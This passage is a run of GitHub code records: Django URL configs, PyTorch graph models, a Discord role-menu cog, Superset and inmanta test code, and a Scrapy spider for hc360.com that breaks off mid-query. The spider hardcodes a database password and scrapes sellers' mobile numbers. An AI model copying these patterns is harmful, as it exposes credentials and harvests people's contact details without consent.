import views\n\nurlpatterns = [\n    url(r'^$', views.index, name='index'),\n    url(r'^books/$', views.books, name='books'),\n    url(r'^add/$', views.add, name='add'),\n    url(r'^addBook/$', views.addBook, name='addBook'),\n    url(r'^books/(?P<bookId>\\d+)$', views.bookReview, name='bookReview'),\n    url(r'^addReview/(?P<bookId>\\d+)$', views.addReview, name='addReview'),\n    url(r'^user/(?P<userId>\\d+)$', views.user, name='user'),\n    url(r'^delete/(?P<reviewId>\\d+)$', views.delete, name='delete')\n]\n","repo_name":"randyhperez/DojoAssignments","sub_path":"Python/django/belt_reviewer/apps/booksApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} {"seq_id":"19640542317","text":"import torch\nfrom torch import nn\n\nfrom src.models.FlexSchNet import Flexible_latent_SchNet\n\nfrom src.models.common import CrossAttentionType, CrossAttentionLayer, Head\nfrom src.datamodules import DataBatch\nfrom src.huggingmolecules import RMatConfig\nfrom src.huggingmolecules.models import RMatModel\nfrom src.huggingmolecules.models.models_common_utils import clones\nfrom src.models.rmat_rmat import RmatRmatModel\n\n\nclass RMatSchNetModel(RmatRmatModel):\n    def __init__(self,\n                 lr: float = 1e-3,\n                 cross_attention_type: CrossAttentionType = CrossAttentionType.NONE,\n                 rmat_config: RMatConfig = RMatConfig.get_default(use_bonds=False),\n                 latent_size: int = None,\n                 schnet_latent_size: int = None,\n                 targets=[],\n                 thresholds={},\n                 activity_importance=0.0,\n                 **kwargs,\n                 ):\n        if schnet_latent_size is None:\n            schnet_latent_size = rmat_config.d_model\n        if latent_size is None:\n            latent_size = (rmat_config.d_model+schnet_latent_size)//2\n        super().__init__(\n                         cross_attention_type=cross_attention_type,\n                         rmat_config=rmat_config,\n                         latent_size=latent_size,\n                         targets=targets,\n                         thresholds=thresholds,\n                         activity_importance=activity_importance,\n                         **kwargs)\n        # TODO: config?\n        self.target_net = Flexible_latent_SchNet(latent_size=schnet_latent_size)\n        in_size = rmat_config.d_model + schnet_latent_size\n        self.aggregator = nn.Sequential(\n            nn.Linear(\n                in_features=in_size,\n                out_features=in_size,\n            ),\n            # nn.BatchNorm1d(2 * rmat_config.d_model),\n            nn.ReLU(),\n            nn.Linear(in_features=in_size, out_features=latent_size),\n            # nn.BatchNorm1d(latent_size),\n        )\n\n    def forward(self, x):\n        ligand_batch = x[\"data\"].ligand_features\n        target_batch = x[\"data\"].target_features\n        # PL logger requires it to be float\n        self.log(\n            \"train_num_ligand_nodes\",\n            float(x[\"data\"].ligand_features.node_features.size(1)),\n        )\n        # self.log(\n        #     \"train_num_target_nodes\",\n        #     float(x[\"data\"].target_features.node_features.size(1)),\n        # )\n\n        ligand_batch_mask = (\n            torch.sum(torch.abs(ligand_batch.node_features), dim=-1) != 0\n        )\n        target_batch_mask = (\n            torch.ones_like(ligand_batch_mask)\n        )\n\n        ligand_latent = self.ligand_net.src_embed(ligand_batch.node_features)\n        target_latent = self.target_net(z=target_batch.node_z,\n                                        pos=target_batch.node_pos,\n                                        batch=target_batch.batch)\n\n        ligand_distances_matrix = self.ligand_net.dist_rbf(\n            ligand_batch.distance_matrix\n        )\n        # target_distances_matrix = self.target_net.dist_rbf(\n        #     target_batch.distance_matrix\n        # )\n        target_latent = target_latent.unsqueeze(1)\n\n        if self.hparams.rmat_config.use_bonds:\n            ligand_edges_att = torch.cat(\n                (\n                    ligand_batch.bond_features,\n                    ligand_batch.relative_matrix,\n                    ligand_distances_matrix,\n                ),\n                dim=1,\n            )\n        else:\n            ligand_edges_att = target_edges_att = None\n\n        for (\n            
ligand_rmat_encoder_layer,\n            # target_rmat_encoder_layer,\n            ligand_ca_layer,\n            target_ca_layer,\n        ) in zip(\n            self.ligand_net.encoder.layers,\n            # self.target_net.encoder.layers,\n            self.ligand_ca_layers,\n            self.target_ca_layers,\n        ):\n            ligand_latent = ligand_rmat_encoder_layer(\n                ligand_latent, ligand_batch_mask, edges_att=ligand_edges_att\n            )\n\n            if self.hparams.cross_attention_type in [\n                CrossAttentionType.LIGAND,\n                CrossAttentionType.BOTH,\n            ]:\n                new_ligand_latent = ligand_ca_layer(\n                    target_latent,\n                    ligand_latent,\n                    ligand_batch_mask,\n                    edges_att=None,\n                    edges_att_v=ligand_edges_att,\n                )\n            else:\n                new_ligand_latent = ligand_latent\n            if self.hparams.cross_attention_type in [\n                CrossAttentionType.TARGET,\n                CrossAttentionType.BOTH,\n            ]:\n                new_target_latent = target_ca_layer(\n                    ligand_latent,\n                    target_latent,\n                    target_batch_mask,\n                    edges_att=ligand_edges_att,\n                    edges_att_v=None,\n                )\n            else:\n                new_target_latent = target_latent\n            ligand_latent, target_latent = new_ligand_latent, new_target_latent\n\n        ligand_encoded = self.ligand_net.encoder.norm(ligand_latent)\n        # target_encoded = self.target_net.encoder.norm(target_latent)\n        target_encoded = target_latent\n        # Aggregating from dummy node\n        latent_code = self.aggregator(\n            torch.cat([ligand_encoded[:, 0, :], target_encoded[:, 0, :]], dim=1)\n        )\n        output = self.get_head_outputs(latent_code, x)\n\n        return output\n","repo_name":"remilvus/DrugRepositioning","sub_path":"src/models/schnet_rmat.py","file_name":"schnet_rmat.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} {"seq_id":"9744435814","text":"from pyboard import *\n\n\ndef test_1():\n    \"\"\"First test. Start up of project.\"\"\"\n    board = Board(3, 3, blank_spaces=True)\n    board.numerate()\n    print(board)\n\n\ndef test_2():\n    \"\"\"\n    Implemented:\n    -The board can now be defined with an array\n    -It is now possible to edit the values (update only)\n    \"\"\"\n    data = [\n        [1, 2, 3],\n        [1, 2, 3]\n    ]\n    board = Board(3, 3, data=data)\n    board[0][0] = None\n    board[1][2] = None\n    board.numerate()\n    print(board)\n\n\ndef test_3():\n    \"\"\"\n    Implemented:\n    -The board can now build itself or receive an array with data without problems.\n    -New method get dims implemented: If data is passed, it auto gets the dimensions.\n    \"\"\"\n    data = [\n        [9, 2, 3],\n        [1, 2, 3]\n    ]\n    # board = Board() -> Exception: Board is empty\n    board = Board(3, 3)\n    board2 = Board(data=data)\n    print(board)\n    print(board.get_dims(), '\\n')\n    print(board2)\n\n\n# The tests above will probably not work.\n\n\ndef test_4():\n    \"\"\"\n    Implemented:\n    The data argument is now validated and needs to be a list of Lines.\n    All lines must have the same number of elements.\n    \"\"\"\n    \"\"\" Working\n    board = Board(3, 3)\n    print(type(board[0]) is Line)\n    print(board) \n    \"\"\"\n    data1 = [  # Failing\n        [9, 2, 3],\n        [1, 2, 3]\n    ]\n    data2 = [  # Working\n        Line([9, 2, 3]),\n        Line([1, 2, 3])\n    ]\n    data3 = [  # Failing\n        Line([9, 2, 3, 7]),\n        Line([1, 2, 3])\n    ]\n    board = Board(data=data2)\n    print(board)\n\n\ndef test_5():\n    \"\"\"\n    Implemented:\n    -Computing columns.\n    \"\"\"\n    data = [\n        Line([9, 2, 3]),\n        Line([1, 7, 1]),\n        Line([6, 1, 2]),\n        Line([3, 2, 0]),\n        Line([4, 8, 9]),\n    ]\n    b = Board(data=data)\n    print(b.columns)\n\n\ndef test_6():\n    \"\"\"\n    Implemented:\n    -Align Columns in print\n    \"\"\"\n    data = [\n        Line(['Xp0--', 3332, 132]),\n        Line(['life-', 72, 13]),\n        Line([6, 1000, 2]),\n        Line([333, 2, 400]),\n        Line([4, 8, 9]),\n    ]\n    b = Board(data=data)\n    # 
    # print(b.standard_impress())\n    print(b)\n\n\ndef test_7():\n    \"\"\"\n    Implemented:\n    -Board validation is now a property\n    -Pseudo-private attributes turned into public ones\n    \"\"\"\n    data = [\n        [1, 2, 3],\n        [1, 2, 3, 4]\n    ]\n    b = Board(data=data)\n    print(b)\n\n\ndef test_8():\n    \"\"\"\n    Implemented:\n    -Board is now iterable\n    \"\"\"\n    b = Board(3, 3)\n    b.numerate()\n    for line in b:\n        for obj in line:\n            print(obj)\n\n\ndef test_9():\n    \"\"\"\n    Board\n    Implemented:\n    -Columns attr now updates\n    -Column object discarded, turned into a list\n    -It is now possible to iterate over the board\n    -Append method implemented\n    Bug Fix:\n    -Aligned impress TypeError\n\n    Line\n    Implemented:\n    -Size limited. Append doesn't work once the size limit is reached.\n    -__getitem__ doesn't raise exceptions.\n    \"\"\"\n    b = Board(3, 3)\n    b.numerate()\n    b.append(Line(data=[9, 9, 9]))\n    print(b)\n\n\ndef test_10():\n    \"\"\"\n    Board\n    Changed:\n    -Update is now done by a method.\n    -Board setter now checks all elements.\n    -Method order organized.\n    Implemented:\n    - __len__()\n\n    Line\n    Changed:\n    -Length limit was replaced by an open/close system.\n    \"\"\"\n    b = Board(3, 3)\n    b.numerate()\n    print(b.get_dims())\n    b.append(Line(data=[9, 9, 9]))\n    print(b.get_dims())\n    # b[0].append(1) # Exception: The Line is closed. It can't receive more elements.\n\n\nif __name__ == '__main__':\n    test_10()\n","repo_name":"KevBoyz/PyBoard","sub_path":"tests/test_core_Board.py","file_name":"test_core_Board.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"13328441006","text":"import disnake\nfrom disnake.ext import commands\nfrom disnake import ui\nimport typing\n\n# class RoleSelect(ui.Select):\n#     def __init__(self, custom_id:str, options:typing.List[disnake.SelectOption], only_one:bool=False, allow_empty:bool=True, placeholder:str=\"Select\"):\n#         \"\"\" Initialize a new RoleSelect handler \"\"\"\n#         custom_id = \"rolemenu-\" + custom_id\n#         if allow_empty: options.append(disnake.SelectOption(label=\"None\", value=\"0\"))\n#         super().__init__(placeholder=placeholder, options=options, custom_id=custom_id, max_values=1 if only_one else len(options))\n#     async def callback(self, interaction: disnake.ApplicationCommandInteraction): pass # handled in on_interaction below\n\nclass RoleSelectCog(commands.Cog, name='RoleSelect Cog'):\n    \"\"\" This cog handles role select interactions \"\"\"\n    def __init__(self, bot: commands.Bot):\n        self.bot = bot\n    \n    known_rolemenus = {\n        \"color_roles\": [899376611814670376, 899376914333040701, 899376964937322566, 899377152728903711, 899378077317091378, 899377212153815041, 899377291510050846, 899377342756044810, 899377501137150012, 899378012204707851, 899377632473415721, 899377900233588746, 899377826376056882],\n        \"pronouns\": [899371117666521178, 899371152877711441, 899371185329037322, 899371222083731508, 899371302614343731, 957976015207014410, 899372444735905843, 899401124031914044, 957976073231011840],\n        \"pings\": [957985234136227890, 957985334157799524],\n        \"dms\": [957985376922927135, 957985444568641566],\n        \"graduation_year\": [899383365382320149, 899383402074083359, 899383430406602782, 998406336180146220],\n        \"vent\": [903681643548672020],\n        \"lgbt\": [1039151271371874314],\n        \"server_pings\": [900006786013224970, 900006978926039070, 904931272445554698]\n    }\n\n    @commands.Cog.listener(\"on_interaction\")\n    async def on_interaction(self, interaction: disnake.ApplicationCommandInteraction):\n        if interaction.type == disnake.InteractionType.component:\n            if 
interaction.data['custom_id'][0:9] == \"rolemenu-\":\n _, label = interaction.data['custom_id'].split('-')\n if label not in self.known_rolemenus:\n raise ValueError(f\"Unknown rolemenu {label}! Something has gone wrong!\")\n print(\"DEV Received data from rolemenu\", label)\n roles = [int(i) for i in self.known_rolemenus[label]]\n uroles = [r.id for r in interaction.user.roles]\n vroles = [int(r) for r in interaction.data['values']]\n text = \"\"\n for ri in roles:\n ro = interaction.guild.get_role(ri)\n if ro is not None:\n if ri not in uroles and ri in vroles:\n text += f\"✅ Gave role {ro.mention}\\n\"\n await interaction.user.add_roles(ro)\n elif ri in uroles and ri not in vroles:\n text += f\"✅ Removed role {ro.mention}\\n\"\n await interaction.user.remove_roles(ro)\n else:\n text += f\"Could not find role {ri}, something has gone wrong!\"\n if text != \"\":\n await interaction.response.send_message(\n embed=disnake.Embed(\n description=\"\\n\"+text,\n color=disnake.Color.green()\n ), ephemeral=True)\n else:\n await interaction.response.send_message(\n embed=disnake.Embed(\n description=\"\\n⚠️ No new roles to grant or revoke!\\n\",\n color=disnake.Color.yellow()\n ), ephemeral=True)\n \n\n ## EXAMPLE command to create a role menu\n # @commands.slash_command(name=\"generate-rolemenu\")\n # async def make_rolemenu(self, interaction: disnake.ApplicationCommandInteraction):\n # options = [\n # disnake.SelectOption(label=\"Vent channel access\", value=\"903681643548672020\"),\n # ]\n # options2 = [\n # disnake.SelectOption(label=\"LGBTQ :D\", value=\"1039151271371874314\")\n # ]\n # view = ui.View()\n # view.add_item(RoleSelect(options=options, custom_id=\"vent\", only_one=True, allow_empty=True, placeholder=\"Vent channel access\"))\n # view.add_item(RoleSelect(options=options2, custom_id=\"lgbt\", only_one=True, allow_empty=True, placeholder=\"🌈❓\"))\n # await interaction.channel.send(embed=disnake.Embed(\n # title=\"Other Roles\",\n # color=disnake.Color.from_rgb(0, 0, 0)\n # ), view=view)\n # await interaction.response.send_message(\"Created rolemenu.\", delete_after=5, ephemeral=True)\n\n\n# needed per cog\ndef setup(bot):\n bot.add_cog(RoleSelectCog(bot))","repo_name":"Kalamuwu/PAServer_v2","sub_path":"cogs/roleselect.py","file_name":"roleselect.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"25386750842","text":"from m4i_analytics.m4i.portal.model.superset.slices.AbstractSlice import AbstractSlice\n\nclass TableSlice(AbstractSlice):\n \n VIZ_TYPE = 'table'\n \n def _init_params(self, all_columns=[]\n , all_columns_x=None\n , all_columns_y=None\n , annotation_layers=None\n , bar_stacked=None\n , bottom_margin=None\n , cache_timeout=None\n , canvas_image_rendering=None\n , charge=None\n , code=None\n , collapsed_fieldsets=None\n , color_scheme=None\n , columns=[]\n , combine_metric=None\n , compare_lag=None\n , compare_suffix=None\n , contribution=None\n , country_fieldtype=None\n , datasource=None\n , date_filter=None\n , domain_granularity=None\n , donut=None\n , druid_datasource_id=None\n , entity=None\n , filters=[]\n , granularity=None\n , granularity_sqla=None\n , groupby=[]\n , having=''\n , include_search=False\n , include_time=False\n , instant_filtering=False\n , labels_outside=None\n , left_margin=None\n , limit=None\n , line_interpolation=None\n , linear_color_scheme=None\n , link_length=None\n , mapbox_style=None\n , markup_type=None\n , max_bubble_size=None\n , 
metric=None\n                     , metric_2=None\n                     , metrics=[]\n                     , min_periods=None\n                     , normalize_across=None\n                     , num_period_compare=None\n                     , number_format=None\n                     , order_bars=None\n                     , order_by_cols=[]\n                     , order_desc=True\n                     , page_length=0\n                     , pandas_aggfunc=None\n                     , period_ratio_type=None\n                     , pie_label_type=None\n                     , pivot_margins=None\n                     , reduce_x_ticks=None\n                     , resample_fillmethod=None\n                     , resample_how=None\n                     , resample_rule=None\n                     , rich_tooltip=None\n                     , rolling_periods=None\n                     , rolling_type=None\n                     , rotation=None\n                     , row_limit=None\n                     , secondary_metric=None\n                     , series=None\n                     , show_bar_value=None\n                     , show_brush=None\n                     , show_bubbles=None\n                     , show_controls=None\n                     , show_druid_time_granularity=None\n                     , show_druid_time_origin=None\n                     , show_legend=None\n                     , show_markers=None\n                     , show_sqla_time_column=None\n                     , show_sqla_time_granularity=None\n                     , since=''\n                     , size=None\n                     , size_from=None\n                     , size_to=None\n                     , slice_id=None\n                     , slice_name=None\n                     , subdomain_granularity=None\n                     , subheader=None\n                     , table_filter=False\n                     , table_timestamp_format=None\n                     , time_compare=None\n                     , time_grain_sqla=None\n                     , timeseries_limit_metric=None\n                     , until='now'\n                     , url_params=None\n                     , viz_type=None\n                     , where=''\n                     , whisker_options=None\n                     , x=None\n                     , x_axis_bounds=None\n                     , x_axis_format=None\n                     , x_axis_label=None\n                     , x_axis_showminmax=None\n                     , x_log_scale=None\n                     , xscale_interval=None\n                     , y=None\n                     , y_axis_bounds=None\n                     , y_axis_format=None\n                     , y_axis_label=None\n                     , y_axis_showminmax=None\n                     , y_log_scale=None\n                     , yscale_interval=None\n                     , *arg\n                     , **kwarg):\n        self.all_columns = all_columns\n        self.collapsed_fieldsets = collapsed_fieldsets\n        self.filters = filters\n        self.granularity_sqla = granularity_sqla\n        self.groupby = groupby\n        self.having = having\n        self.include_search = include_search\n        self.include_time = include_time\n        self.metrics = (metrics if metrics else []) + [m for m in (combine_metric, metric, metric_2, secondary_metric) if m is not None]\n        self.order_by_cols = order_by_cols\n        self.order_desc = order_desc\n        self.page_length = page_length\n        self.row_limit = row_limit\n        self.since = since\n        self.table_filter = table_filter\n        self.table_timestamp_format = table_timestamp_format\n        self.time_grain_sqla = time_grain_sqla\n        self.timeseries_limit_metric = timeseries_limit_metric\n        self.until = until\n        self.where = where\n    # END _init_params\n    \n    def columnNames(self):\n        return list(set(super(TableSlice, self).columnNames() + self.groupby + self.order_by_cols + self.all_columns))\n    # END directColumnDependencies\n    \n# END TableSlice\n","repo_name":"aureliusenterprise/analytics-library","sub_path":"m4i_analytics/m4i/portal/model/superset/slices/TableSlice.py","file_name":"TableSlice.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"10040602127","text":"from django.urls import path, include\n\nfrom . 
import views\n\napp_name = 'projects'\n\nurlpatterns = [\n    path('', views.projects, name='projects'),\n    path('browse/', include('browse.urls')),\n    path('new/', views.new, name='new'),\n    path('<int:pk>/images/', views.images, name='images'),\n    path('<int:pk>/', views.detail, name='detail'),\n    path('<int:pk>/edit/', views.edit, name='edit'),\n    path('<int:pk>/enhance/', views.enhance, name='enhance'),\n]","repo_name":"enzosupreme/cbp","sub_path":"projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"12219421335","text":"import os\nfrom definitions import *\n\n# function to return the list of persons from a directory\ndef getPersons(dirName):\n    fullDirName = IMAGE_FOLDER_PATH + '/' + dirName\n    print(fullDirName)\n    persons = [name for name in os.listdir(fullDirName)\n               if os.path.isdir(os.path.join(fullDirName, name))]\n    return persons\n    \n#print(getPersons('Students'))\n\n# function to return the list of pictures of a person from a directory \ndef getPersonPictures(friendName, folderName):\n    fullDirName = IMAGE_FOLDER_PATH + '/' + folderName + '/' + friendName\n    #personPictures = [file for file in os.listdir(fullDirName) if file.endswith(\".jpg\") or file.endswith(\".jpeg\")]\n    personPictures = [fullDirName + '/' + file \n                      for file in os.listdir(fullDirName) if file.endswith(\".jpg\") or file.endswith(\".jpeg\")]\n    #print(personPictures)\n    return personPictures\n\n#print(getPersonPictures('Nethra', 'Students'))\n\n# function to read an image\ndef readImage(filePath):\n    with open(filePath, 'rb') as f:\n        data = f.read()\n    return data\n\n#readImage(os.path.dirname(os.path.realpath(__file__)) + '/' + 'Students' + '/Nethra/'+'Nethra4.jpeg')","repo_name":"amitakamat/CMPE-295A-Campus-Safety-using-fog-computing","sub_path":"sample/fileHelpers.py","file_name":"fileHelpers.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"37188716961","text":"import sys\nfrom pathlib import Path\n\nimport pytest\n\nfrom inmanta import const\nfrom pytest_inmanta.handler import DATA\n\n\ndef test_resource(project):\n    assert not project.unittest_resource_exists(name=\"res\")\n\n    with pytest.raises(KeyError):\n        project.unittest_resource_get(name=\"res\")\n\n    project.compile(\n        \"\"\"\n        import unittest\n\n        unittest::Resource(name=\"res\", desired_value=\"x\")\n        \"\"\"\n    )\n    project.deploy_resource(\"unittest::Resource\")\n\n    assert project.unittest_resource_exists(name=\"res\")\n    value = project.unittest_resource_get(name=\"res\")\n    assert value[\"desired_value\"] == \"x\"\n\n    project.compile(\n        \"\"\"\n        import unittest\n\n        unittest::Resource(name=\"res\", desired_value=\"y\")\n        \"\"\"\n    )\n    project.deploy_resource(\"unittest::Resource\", change=const.Change.updated)\n    value = project.unittest_resource_get(name=\"res\")\n    assert value[\"desired_value\"] == \"y\"\n\n    project.compile(\n        \"\"\"\n        import unittest\n\n        unittest::Resource(name=\"res\", desired_value=\"y\", purged=true)\n        \"\"\"\n    )\n    project.deploy_resource(\"unittest::Resource\")\n    assert not project.unittest_resource_exists(name=\"res\")\n\n\ndef test_resource_fail_skip(project):\n    project.compile(\n        \"\"\"\n        import unittest\n\n        unittest::Resource(name=\"res\", desired_value=\"x\", fail=true)\n        \"\"\"\n    )\n    project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.failed)\n\n    project.compile(\n        \"\"\"\n        import unittest\n\n        
unittest::Resource(name=\"res\", desired_value=\"x\", skip=true)\n \"\"\"\n )\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.skipped)\n\n\ndef test_resource_fail_skip_data(project):\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\")\n \"\"\"\n )\n\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.deployed)\n\n DATA[\"res\"][\"skip\"] = True\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.skipped)\n\n DATA[\"res\"][\"skip\"] = False\n DATA[\"res\"][\"fail\"] = True\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.failed)\n\n\ndef test_retrieve_logs(project):\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\")\n \"\"\"\n )\n project.deploy_resource(\"unittest::Resource\")\n\n assert project.unittest_resource_exists(name=\"res\")\n logs = project.get_last_logs()\n assert len(logs) == 3\n\n project.dryrun_resource(\"unittest::Resource\")\n logs = project.get_last_logs()\n assert len(logs) == 2\n\n\ndef test_close_cache(project):\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\")\n \"\"\"\n )\n\n project.deploy_resource(\"unittest::Resource\")\n res = project.get_resource(\"unittest::Resource\")\n handler = project.get_handler(res, False)\n project.finalize_handler(handler)\n versions = handler.cache.counterforVersion.keys()\n assert len(versions) == 0\n assert len(handler.cache.cache) == 0\n\n\ndef test_280_sys_executable(project):\n \"\"\"\n Make sure the current python interpreter is the same as the one used by the compiler\n \"\"\"\n assert Path(project._env_path) == Path(sys.executable).parent.parent\n","repo_name":"inmanta/pytest-inmanta","sub_path":"examples/testhandler/tests/test_handler.py","file_name":"test_handler.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10417323008","text":"'''\nCreated on 13 Dec 2021\n\n@author: aftab\n'''\nfrom torch_geometric.datasets import Planetoid\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GATConv\nimport logging\n\n\n\n\n\nclass GAT(torch.nn.Module):\n def __init__(self):\n super(GAT, self).__init__()\n self.hid =32\n self.in_head = 1\n self.out_head = 1\n \n \n self.conv1 = GATConv(dataset.num_features, self.hid, heads=self.in_head)\n self.conv2 = GATConv(self.hid*self.in_head, dataset.num_classes, concat=False,\n heads=self.out_head)\n\n def forward(self, data):\n x, edge_index = data.x, data.edge_index\n \n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = F.dropout(x, p=0.6, training=self.training)\n \n x = self.conv2(x, edge_index)\n x = F.relu(x)\n x = F.dropout(x, p=0.6, training=self.training)\n return F.log_softmax(x, dim=1)\n \n \ndef callGAT(dat):\n stats={}\n global dataset\n dataset = dat\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n device = \"cpu\"\n \n model = GAT().to(device)\n data = dataset.to(device)\n \n \n optimizer = torch.optim.Adam(model.parameters(), lr=0.01, weight_decay=5e-4)\n loss_data=[]\n model.train()\n for epoch in range(200):\n model.train()\n optimizer.zero_grad()\n out = model(data)\n loss = F.nll_loss(out[data.train_mask], data.y[data.train_mask])\n loss_data.append(loss)\n loss.backward()\n optimizer.step()\n \n model.eval()\n _, pred = model(data).max(dim=1)\n \n correct = 
float(pred[data.val_mask].eq(data.y[data.val_mask]).sum().item())\n    acc = correct / data.val_mask.sum().item()\n    #print('GAT Accuracy Validation: {:.4f}'.format(acc))\n    stats['val_acc'] = acc\n    \n    correct = float(pred[data.test_mask].eq(data.y[data.test_mask]).sum().item())\n    acc = correct / data.test_mask.sum().item()\n    #print('GAT Accuracy Test: {:.4f}'.format(acc))\n    \n    stats['test_acc'] = acc\n    return stats, loss_data\n    ","repo_name":"Aftab571/GraphsCodeBase","sub_path":"GATTest.py","file_name":"GATTest.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"74917342349","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Request\nimport time\nfrom bs4 import BeautifulSoup\nimport re\nimport random\nimport os\nimport requests\nimport pymysql\nimport json\nfrom ..items import HuiCongWangItem\n\nconn = pymysql.connect(host='192.168.1.210', user='root', passwd='zhangxing888', db='ktcx_buschance', port=3306,\n                       charset='utf8')\n\ncur = conn.cursor()  # get a cursor\n\n\nclass DataSpider(scrapy.Spider):\n    name = 'data'\n\n    d_id_3 = '185'\n    keywords_name = '冷库'\n    # start_url = 'http://www.912688.com/chanpin/59277801597388C5-orderBymultiple-aoddesc-viewlist-page{}.html'\n    num_2 = 1\n\n    def start_requests(self):\n        url = 'https://s.hc360.com/seller/search.html?kwd=%E5%A4%A7%E7%A0%81%E5%A5%B3%E8%A3%85&pnum=1&ee=1'\n\n        yield Request(url=url, callback=self.parse, )\n\n    def parse(self, response):\n        try:\n            li_list = response.xpath('//div[@class=\"cont-left\"]/div[@class=\"wrap-grid\"]//li')\n            for li in li_list:\n                li_url = li.xpath('./div[@class=\"NewItem\"]/div[@class=\"picmid pRel\"]/a/@href').extract()[0]\n                detail_url = \"https:\" + li_url\n                print('/////////////////////////', detail_url)\n                yield Request(url=detail_url, callback=self.detail_parse)\n        except:\n            print('something went a bit wrong~')\n\n    def detail_parse(self, response):\n        print('parse_detail>>>>>')\n        # print('------------------------',response.text)\\\\\n        item = HuiCongWangItem()\n\n        # get the company name\n        com_name = '-'\n        try:\n            com_name = response.xpath('//div[@class=\"comply-name\"]/p/a/text()')[0].extract()\n            print(com_name)\n        except:\n            print(com_name)\n\n        # call the function and run the SQL statement\n        try:\n            # run the SQL query\n            sql = \"SELECT COUNT(0) FROM bus_product WHERE three_level_id = '{}' AND com_name = '{}' AND is_del = '0'\".format(\n                self.d_id_3, str(com_name))\n            cur.execute(sql)\n            # fetch the query result\n            result = cur.fetchall()\n            result_count = int(result[0][0])\n            print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!', result_count)\n            # conn.connect()\n\n            d_id_3_3 = self.d_id_3\n            keywords_name_2 = self.keywords_name\n\n            if result_count > 0:\n                print('duplicate, skipping')\n            else:\n                mobile = response.xpath('//*[@id=\"dialogCorMessage\"]//em/text()')[0].extract()\n                mobile = re.findall(r'\\d+', mobile, re.S)[0]\n                print('mobile..........', mobile)\n                if mobile:\n                    print('crawl--------------------------------------')\n\n                    # shuju(response, item, d_id_3_3, keywords_name_2)\n                    shuju(response, item, d_id_3_3, keywords_name_2)\n                    print('crawl++++++++++++++++++++++++++++++++++++++')\n                    print('Congrats, crawl number {} succeeded!!!'.format(self.num_2))\n                    self.num_2 += 1\n                    # return item\n                else:\n                    print('no phone number, not crawling')\n\n        except:\n            print('no such record')\n\n\ndef shuju(response, item, d_id_3_3, keywords_name_2):\n    print('detail_p>>>>>>>>>>>>>>>>>')\n\n    # save image info\n    try:\n        os_img_1 = []\n        str_ran = str(random.randint(0, 999999))\n        os_img_1.append(str_ran)\n        os.makedirs('d:\\\\b2b\\\\{}'.format(str_ran))\n        # save the image links to disk\n
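        # Illustrative note (editor's addition, not from the original file):\n        # xpath() returns a SelectorList and .extract() yields plain strings, e.g.:\n        #   Selector(text='<img src=\"//a.jpg\">').xpath('//img/@src').extract()  # ['//a.jpg']\n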
        res_img = response.xpath(\n            '//div[@class=\"tab-content-container\"]//li/div[@class=\"vertical-img zoomThumbActive\"]//img/@src').extract()\n\n        os_img_2_list = []\n        for img_url in res_img:\n            img_url = 'https:' + img_url\n            code_img = requests.get(url=img_url).content\n            img_name = str(random.randint(1, 999999))\n            with open('d:\\\\b2b\\\\{}\\\\{}.jpg'.format(str_ran, img_name), 'wb') as f:\n                f.write(code_img)\n            os_img_2 = 'http://img.ktcx.cn/b2b/' + '{}/{}.jpg'.format(str_ran, img_name)\n            os_img_2_list.append(os_img_2)\n        os_img_2_str_1 = os_img_2_list[0]\n        os_img_2_str = ','.join(os_img_2_list)\n        item['list_img'] = os_img_2_str_1\n        item['imgs'] = os_img_2_str\n        print('images saved ok..')\n    except:\n        print('image error.')\n\n    # create_date = scrapy.Field()  # creation time\n    create_date = '-'\n    try:\n        create_date = time.strftime('%Y.%m.%d %H:%M:%S ', time.localtime(time.time()))\n        print(create_date)\n    except:\n        print(create_date)\n    item['create_date'] = create_date\n\n    # list_img = scrapy.Field()  # image 1\n\n    # price = scrapy.Field()  # price\n    price = '-'\n    try:\n        price = response.xpath('//div[@id=\"oriPriceTop\"]/text()').extract()[0].replace(' ', '').replace('\\t', '').strip()\n        print(price)\n    except:\n        print(price)\n    item['price'] = price\n\n    # title = scrapy.Field()  # title\n    title = '-'\n    try:\n        title = response.xpath('//*[@id=\"comTitle\"]/text()').extract()[0].replace(' ', '').replace('\\t', '').strip()\n        print(title)\n    except:\n        print(title)\n    item['title'] = title\n\n    # way = scrapy.Field()  # way\n    if price != '-':\n        way = '0'\n    else:\n        way = '1'\n    print('way', way)\n    item['way'] = way\n\n    # two_level_id = scrapy.Field()  # level-2 id\n    two_level_id = '-'\n    sql = \"SELECT parent_id FROM bus_industry_category 